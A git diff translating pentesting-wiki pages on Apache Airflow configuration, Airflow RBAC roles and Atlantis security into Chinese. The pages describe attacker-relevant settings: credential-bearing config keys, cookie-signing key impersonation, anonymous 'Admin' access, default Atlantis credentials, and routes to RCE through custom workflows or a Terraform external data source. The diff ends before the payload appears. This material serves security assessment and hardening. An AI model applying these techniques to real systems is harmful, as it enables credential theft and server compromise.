+- **`auth_backend`**: [**根据文档**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) 可以配置一些选项来决定谁可以访问 API:
+- `airflow.api.auth.backend.deny_all`: **默认情况下没有人** 可以访问 API
+- `airflow.api.auth.backend.default`: **每个人都可以** 无需认证地访问
+- `airflow.api.auth.backend.kerberos_auth`: 配置 **kerberos 认证**
+- `airflow.api.auth.backend.basic_auth`: 用于 **基本认证**
+- `airflow.composer.api.backend.composer_auth`: 使用 composer 认证 (GCP) (来自 [**这里**](https://cloud.google.com/composer/docs/access-airflow-api))。
+- `composer_auth_user_registration_role`: 这表示 **composer 用户** 在 **airflow** 中将获得的 **角色**(默认是 **Op**)。
+- 您还可以使用 Python **创建自己的认证** 方法。
+- **`google_key_path`:** GCP 服务账户密钥的路径
### **\[atlas]**
-- **`password`**: Atlas password
-- **`username`**: Atlas username
+- **`password`**: Atlas 密码
+- **`username`**: Atlas 用户名
### \[celery]
-- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
-- **`result_backend`**: Postgres url which may contain **credentials**.
-- **`ssl_cacert`**: Path to the cacert
-- **`ssl_cert`**: Path to the cert
-- **`ssl_key`**: Path to the key
+- **`flower_basic_auth`** : 凭证 (_user1:password1,user2:password2_)
+- **`result_backend`**: 可能包含 **凭证** 的 Postgres URL。
+- **`ssl_cacert`**: cacert 的路径
+- **`ssl_cert`**: 证书的路径
+- **`ssl_key`**: 密钥的路径
### \[core]
-- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`.
-- **`fernet_key`**: Key to store encrypted variables (symmetric)
-- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
-- **`security`**: What security module to use (for example kerberos)
+- **`dag_discovery_safe_mode`**: 默认启用。在发现 DAG 时,忽略任何不包含字符串 `DAG` 和 `airflow` 的文件。
+- **`fernet_key`**: 用于存储加密变量的密钥(对称)
+- **`hide_sensitive_var_conn_fields`**: 默认启用,隐藏连接的敏感信息。
+- **`security`**: 使用哪个安全模块(例如 kerberos)
### \[dask]
-- **`tls_ca`**: Path to ca
-- **`tls_cert`**: Part to the cert
-- **`tls_key`**: Part to the tls key
+- **`tls_ca`**: ca 的路径
+- **`tls_cert`**: 证书的路径
+- **`tls_key`**: tls 密钥的路径
### \[kerberos]
-- **`ccache`**: Path to ccache file
-- **`forwardable`**: Enabled by default
+- **`ccache`**: ccache 文件的路径
+- **`forwardable`**: 默认启用
### \[logging]
-- **`google_key_path`**: Path to GCP JSON creds.
+- **`google_key_path`**: GCP JSON 凭证的路径。
### \[secrets]
-- **`backend`**: Full class name of secrets backend to enable
-- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
+- **`backend`**: 要启用的 secrets 后端的完整类名
+- **`backend_kwargs`**: backend_kwargs 参数被加载到字典中并传递给 secrets 后端类的 **init**。
### \[smtp]
-- **`smtp_password`**: SMTP password
-- **`smtp_user`**: SMTP user
+- **`smtp_password`**: SMTP 密码
+- **`smtp_user`**: SMTP 用户
### \[webserver]
-- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
-- **`cookie_secure`**: Set **secure flag** on the the session cookie
-- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
-- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
-- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
-- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
-- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
-- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
+- **`cookie_samesite`**: 默认是 **Lax**,因此它已经是可能的最弱值
+- **`cookie_secure`**: 在会话 cookie 上设置 **secure flag**
+- **`expose_config`**: 默认是 False,如果为 true,**config** 可以从 web **console** 中 **读取**
+- **`expose_stacktrace`**: 默认是 True,它将显示 **python tracebacks**(对攻击者可能有用)
+- **`secret_key`**: 这是 **flask 用于签署 cookies 的密钥**(如果您拥有此密钥,您可以 **冒充 Airflow 中的任何用户**)
+- **`web_server_ssl_cert`**: **SSL** **证书** 的 **路径**
+- **`web_server_ssl_key`**: **SSL** **密钥** 的 **路径**
+- **`x_frame_enabled`**: 默认是 **True**,因此默认情况下不可能发生点击劫持
### Web Authentication
-By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
-
+默认情况下,**web authentication** 在文件 **`webserver_config.py`** 中指定,并配置为
```bash
AUTH_TYPE = AUTH_DB
```
-
-Which means that the **authentication is checked against the database**. However, other configurations are possible like
-
+这意味着**身份验证是针对数据库进行检查的**。然而,还有其他配置是可能的,例如
```bash
AUTH_TYPE = AUTH_OAUTH
```
+将**身份验证委托给第三方服务**。
-To leave the **authentication to third party services**.
-
-However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
-
+然而,还有一个选项可以**允许匿名用户访问**,将以下参数设置为**所需角色**:
```bash
AUTH_ROLE_PUBLIC = 'Admin'
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
index 7ff782327..fd5a2b9f5 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
@@ -4,44 +4,40 @@
## RBAC
-(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
+(来自文档)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow 默认提供了一 **组角色**: **Admin**, **User**, **Op**, **Viewer**, 和 **Public**. **只有 `Admin`** 用户可以 **配置/更改其他角色的权限**. 但不建议 `Admin` 用户以任何方式更改这些默认角色,删除或添加这些角色的权限。
-- **`Admin`** users have all possible permissions.
-- **`Public`** users (anonymous) don’t have any permissions.
-- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
-- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
-- **`Op`** users have `User` permissions plus additional op permissions.
+- **`Admin`** 用户拥有所有可能的权限。
+- **`Public`** 用户(匿名)没有任何权限。
+- **`Viewer`** 用户拥有有限的查看权限(仅可读)。它 **无法查看配置**。
+- **`User`** 用户拥有 `Viewer` 权限以及额外的用户权限,允许他管理 DAG。 他 **可以查看配置文件**。
+- **`Op`** 用户拥有 `User` 权限以及额外的操作权限。
-Note that **admin** users can **create more roles** with more **granular permissions**.
+请注意,**admin** 用户可以 **创建更多角色**,并赋予更 **细粒度的权限**。
-Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
+还要注意,唯一具有 **列出用户和角色权限的默认角色是 Admin,连 Op** 都无法做到这一点。
-### Default Permissions
+### 默认权限
-These are the default permissions per default role:
+以下是每个默认角色的默认权限:
- **Admin**
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
+\[可以在 Connections 上删除,可以在 Connections 上读取,可以在 Connections 上编辑,可以在 Connections 上创建,可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 Pools 上删除,可以在 Pools 上读取,可以在 Pools 上编辑,可以在 Pools 上创建,可以在 Providers 上读取,可以在 Variables 上删除,可以在 Variables 上读取,可以在 Variables 上编辑,可以在 Variables 上创建,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Configurations 上读取,可以在 Plugins 上读取,可以在 Roles 上读取,可以在 Permissions 上读取,可以在 Roles 上删除,可以在 Roles 上编辑,可以在 Roles 上创建,可以在 Users 上读取,可以在 Users 上创建,可以在 Users 上编辑,可以在 Users 上删除,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances,可以在 Task Instances 上创建,可以在 Task Instances 上删除,菜单访问 Admin,菜单访问 Configurations,菜单访问 Connections,菜单访问 Pools,菜单访问 Variables,菜单访问 XComs,可以在 XComs 上删除,可以在 Task Reschedules 上读取,菜单访问 Task Reschedules,可以在 Triggers 上读取,菜单访问 Triggers,可以在 Passwords 上读取,可以在 Passwords 上编辑,菜单访问 List Users,菜单访问 Security,菜单访问 List Roles,可以在 User Stats Chart 上读取,菜单访问 User's Statistics,菜单访问 Base Permissions,可以在 View Menus 上读取,菜单访问 Views/Menus,可以在 Permission Views 上读取,菜单访问 Permission on Views/Menus,可以在 MenuApi 上获取,菜单访问 Providers,可以在 XComs 上创建]
- **Op**
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
+\[可以在 Connections 上删除,可以在 Connections 上读取,可以在 Connections 上编辑,可以在 Connections 上创建,可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 Pools 上删除,可以在 Pools 上读取,可以在 Pools 上编辑,可以在 Pools 上创建,可以在 Providers 上读取,可以在 Variables 上删除,可以在 Variables 上读取,可以在 Variables 上编辑,可以在 Variables 上创建,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Configurations 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances,可以在 Task Instances 上创建,可以在 Task Instances 上删除,菜单访问 Admin,菜单访问 Configurations,菜单访问 Connections,菜单访问 Pools,菜单访问 Variables,菜单访问 XComs,可以在 XComs 上删除]
- **User**
-\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
+\[可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances,可以在 Task Instances 上创建,可以在 Task Instances 上删除]
- **Viewer**
-\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
+\[可以在 DAGs 上读取,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances]
- **Public**
\[]
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md
index a4b35140f..551a30a82 100644
--- a/src/pentesting-ci-cd/atlantis-security.md
+++ b/src/pentesting-ci-cd/atlantis-security.md
@@ -4,109 +4,109 @@
### Basic Information
-Atlantis basically helps you to to run terraform from Pull Requests from your git server.
+Atlantis 基本上帮助你从 git 服务器的 Pull Requests 运行 terraform。
.png>)
### Local Lab
-1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
-2. Create a **personal token** (with repo access) of your **github** user
-3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
- 1. You can access the web page in 127.0.0.1:4141
+1. 前往 **atlantis releases page** 在 [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) 并 **下载** 适合你的版本。
+2. 创建一个 **个人令牌**(具有 repo 访问权限)你的 **github** 用户
+3. 执行 `./atlantis testdrive`,它将创建一个你可以用来 **与 atlantis 交互的 demo repo**
+1. 你可以在 127.0.0.1:4141 访问网页
### Atlantis Access
#### Git Server Credentials
-**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
-However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
-[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
+**Atlantis** 支持多个 git 主机,如 **Github**、**Gitlab**、**Bitbucket** 和 **Azure DevOps**。\
+然而,为了访问这些平台上的 repos 并执行操作,它需要一些 **特权访问权限**(至少写权限)。\
+[**文档**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) 鼓励在这些平台上为 Atlantis 创建一个用户,但有些人可能会使用个人账户。
> [!WARNING]
-> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
+> 在任何情况下,从攻击者的角度来看,**Atlantis 账户**将是一个非常 **有趣的** **目标**。
#### Webhooks
-Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
+Atlantis 可选地使用 [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) 来验证它从你的 Git 主机接收到的 **webhooks** 是否是 **合法的**。
-One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
+确认这一点的一种方法是 **仅允许来自 Git 主机的 IP 的请求**,但更简单的方法是使用 Webhook Secret。
-Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
+请注意,除非你使用私有的 github 或 bitbucket 服务器,否则你需要将 webhook 端点暴露到互联网。
> [!WARNING]
-> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
+> Atlantis 将 **暴露 webhooks**,以便 git 服务器可以向其发送信息。从攻击者的角度来看,了解 **你是否可以向其发送消息** 将是有趣的。
#### Provider Credentials
-[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html)
+[来自文档:](https://www.runatlantis.io/docs/provider-credentials.html)
-Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
+Atlantis 通过简单地 **在托管 Atlantis 的服务器上执行 `terraform plan` 和 `apply`** 命令来运行 Terraform。就像在本地运行 Terraform 一样,Atlantis 需要你特定提供者的凭据。
-It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
+你可以选择如何 [提供凭据](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) 给 Atlantis:
-- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
-- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
- - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
- - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
-- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
-- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
-- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
+- Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) 和 [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) 有自己的提供者凭据机制。请阅读它们的文档。
+- 如果你在云中运行 Atlantis,那么许多云都有方法为在其上运行的应用程序提供云 API 访问权限,例如:
+- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs)(搜索 "EC2 Role")
+- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
+- 许多用户设置环境变量,例如 `AWS_ACCESS_KEY`,在 Atlantis 运行的地方。
+- 其他人创建必要的配置文件,例如 `~/.aws/credentials`,在 Atlantis 运行的地方。
+- 使用 [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) 获取提供者凭据。
> [!WARNING]
-> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
+> **运行** **Atlantis** 的 **容器** 很可能 **包含特权凭据**,用于 Atlantis 通过 Terraform 管理的提供者(AWS、GCP、Github...)。
#### Web Page
-By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
+默认情况下,Atlantis 将在 **localhost 的 4141 端口运行一个网页**。此页面仅允许你启用/禁用 atlantis apply 并检查 repos 的计划状态并解锁它们(它不允许修改内容,因此不是很有用)。
-You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
+你可能不会发现它暴露在互联网上,但默认情况下 **不需要凭据** 来访问它(如果需要,`atlantis`:`atlantis` 是 **默认** 的)。
### Server Configuration
-Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
+对 `atlantis server` 的配置可以通过命令行标志、环境变量、配置文件或三者的混合来指定。
-- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
-- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
+- 你可以在 [**这里找到标志列表**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) 由 Atlantis 服务器支持
+- 你可以在 [**这里找到如何将配置选项转换为环境变量**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
-Values are **chosen in this order**:
+值的 **选择顺序** 为:
-1. Flags
-2. Environment Variables
-3. Config File
+1. 标志
+2. 环境变量
+3. 配置文件
> [!WARNING]
-> Note that in the configuration you might find interesting values such as **tokens and passwords**.
+> 请注意,在配置中你可能会发现一些有趣的值,如 **令牌和密码**。
#### Repos Configuration
-Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
+一些配置影响 **repos 的管理方式**。然而,可能 **每个 repo 需要不同的设置**,因此有方法指定每个 repo。这是优先顺序:
-1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
- 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
-2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
-3. **Default** values
+1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) 文件。此文件可用于指定 atlantis 应如何处理该 repo。然而,默认情况下某些键在没有某些标志允许的情况下无法在此处指定。
+1. 可能需要通过标志如 `allowed_overrides` 或 `allow_custom_workflows` 进行允许
+2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config):你可以通过标志 `--repo-config` 传递它,这是一个 yaml 配置每个 repo 的新设置(支持正则表达式)
+3. **默认** 值
**PR Protections**
-Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
+Atlantis 允许指示你是否希望 **PR** 被其他人 **`批准`**(即使在分支保护中未设置)和/或在运行 apply 之前 **`可合并`**(分支保护通过)。从安全角度来看,设置这两个选项是推荐的。
-In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
+如果 `allowed_overrides` 为 True,这些设置可以在每个项目的 `/atlantis.yml` 文件中 **被覆盖**。
**Scripts**
-The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.**
+repo 配置可以 **指定脚本** 在 [**之前**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage)(_预工作流钩子_)和 [**之后**](https://www.runatlantis.io/docs/post-workflow-hooks.html)(_后工作流钩子_)执行 **工作流**。
-There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file.
+没有任何选项允许在 **repo `/atlantis.yml`** 文件中 **指定** 这些脚本。
**Workflow**
-In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
-Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
+在 repo 配置(服务器端配置)中,你可以 [**指定一个新的默认工作流**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow),或 [**创建新的自定义工作流**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**。** 你还可以 **指定** 哪些 **repos** 可以 **访问** 生成的新工作流。\
+然后,你可以允许每个 repo 的 **atlantis.yaml** 文件 **指定要使用的工作流**。
> [!CAUTION]
-> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\
-> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
+> 如果 [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allow_custom_workflows` 设置为 **True**,则可以在每个 repo 的 **`atlantis.yaml`** 文件中 **指定** 工作流。也可能需要 **`allowed_overrides`** 也指定 **`workflow`** 以 **覆盖将要使用的工作流**。\
+> 这基本上会给 **任何可以访问该 repo 的用户在 Atlantis 服务器上提供 RCE**。
>
> ```yaml
> # atlantis.yaml
@@ -126,19 +126,18 @@ Then, you can allow the **atlantis.yaml** file of each repo to **specify the wor
**Conftest Policy Checking**
-Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include:
+Atlantis 支持在计划输出上运行 **服务器端** [**conftest**](https://www.conftest.dev/) **策略**。使用此步骤的常见用例包括:
-- Denying usage of a list of modules
-- Asserting attributes of a resource at creation time
-- Catching unintentional resource deletions
-- Preventing security risks (ie. exposing secure ports to the public)
+- 拒绝使用模块列表
+- 在创建时断言资源的属性
+- 捕获无意的资源删除
+- 防止安全风险(即将安全端口暴露给公众)
-You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
+你可以在 [**文档中**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works) 查看如何配置它。
### Atlantis Commands
-[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
-
+[**在文档中**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) 你可以找到运行 Atlantis 的选项:
```bash
# Get help
atlantis help
@@ -161,94 +160,82 @@ atlantis apply [options] -- [terraform apply flags]
## --verbose
## You can also add extra terraform options
```
-
-### Attacks
+### 攻击
> [!WARNING]
-> If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
-
-You can fix it by running:
+> 如果在利用过程中发现此 **错误**: `Error: Error acquiring the state lock`
+您可以通过运行以下命令来修复它:
```
atlantis unlock #You might need to run this in a different PR
atlantis plan -- -lock=false
```
+#### Atlantis plan RCE - 在新PR中修改配置
-#### Atlantis plan RCE - Config modification in new PR
-
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
-
-You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file:
+如果您对一个仓库具有写入权限,您将能够在其上创建一个新分支并生成一个PR。如果您可以**执行 `atlantis plan`**(或者可能是自动执行的)**您将能够在Atlantis服务器内部进行RCE**。
